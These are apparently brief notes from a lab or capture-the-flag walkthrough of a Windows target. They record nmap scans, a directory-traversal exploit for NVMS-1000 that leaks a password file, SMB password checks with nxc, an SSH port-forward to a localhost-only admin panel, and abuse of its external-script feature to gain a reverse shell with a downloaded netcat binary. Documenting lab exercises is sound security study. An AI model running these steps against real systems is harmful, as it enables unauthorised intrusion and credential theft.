Network Scanning
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IP
Anonymous access is enabled
Two users: Nadine, Nathan
each has a file.
Interesting entries regarding initial access:
- Remove public access to NVMS
searchsploit nvms-1000
We see a directory traversal
python2.7 windows/system32/drivers/etc/hosts out.txt
The previous note references where to find creds
lets see if we can leak the file
python2.7 Users/nathan/Desktop/Passwords.txt pass
This wasn’t working, trying the other PoC in burp works
Make a password list
check against smb with nxc
nxc smb -u nadine -p pass --shares --local-auth
ssh is running, lets see if we can log in
ssh nadine@
Priv Esc
We can use: windows/local/46802.txt
web panel password
We can’t login
Looking at the config file again, we see its only allowing access via localhost
We may be able to use ssh to route our web traffic through the local interface.
ssh -L 8443: nadine@
We can access it locally!
We can login!
Now we can enable:
- CheckExternalScripts - Scheduler
get nc.exe
wget && mv nc64.exe nc.exe
download to disk
setup a listener
Build script
Now we save the configuration and reload the service:
wait for a shell
This wasn’t working - I tried a million permutations.
Eventually, I found you can run your custom commands via the console instead of waiting for the schedular to execute it.
And we catch a shell